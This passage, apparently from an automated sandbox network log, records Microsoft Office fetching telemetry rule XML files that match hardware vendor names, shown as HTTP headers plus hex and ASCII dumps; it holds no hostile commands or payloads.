                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            32192.168.2.44976813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:11 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 3029707a-401e-0047-3163-3b8597000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111011Z-178bfbc474bbcwv4hC1NYCypys00000001ag000000001p3m
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:11 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            33192.168.2.44977113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:13 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 420
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111013Z-178bfbc474b9xljthC1NYCtw94000000015g00000000fkm3
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            34192.168.2.44977213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:13 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 76e93f39-101e-0034-5559-3b96ff000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111013Z-178bfbc474bwh9gmhC1NYCy3rs00000001dg00000000a17g
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            35192.168.2.44977313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:13 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 79192ebf-401e-0035-7e68-3b82d8000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111013Z-178bfbc474b7cbwqhC1NYC8z4n00000001d00000000005wb
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            36192.168.2.44977413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:13 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 486
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 95b9e869-801e-008c-3081-3b7130000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111013Z-1777c6cb754g9zd5hC1TEBfvpw0000000b2000000000cs9s
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            37192.168.2.44977513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:13 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:13 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 423
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 57b2d8b6-201e-0033-2767-3bb167000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111013Z-178bfbc474bv7whqhC1NYC1fg400000001bg000000009xwx
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:14 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            38192.168.2.44977613.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:15 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:16 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:15 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 478
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: e845eaf5-101e-008e-5d91-3bcf88000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111015Z-r1d97b99577n4dznhC1TEBc1qw0000000aa0000000006f7y
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:16 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            39192.168.2.44977713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:15 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:15 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 404
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: ae8c6dce-101e-008d-4280-3b92e5000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111015Z-1777c6cb754lv4cqhC1TEB13us0000000b0g000000006qha
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:16 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            40192.168.2.44977913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:15 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:16 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 400
                                                                                                                                                                                                                                                                                                            Connection: close
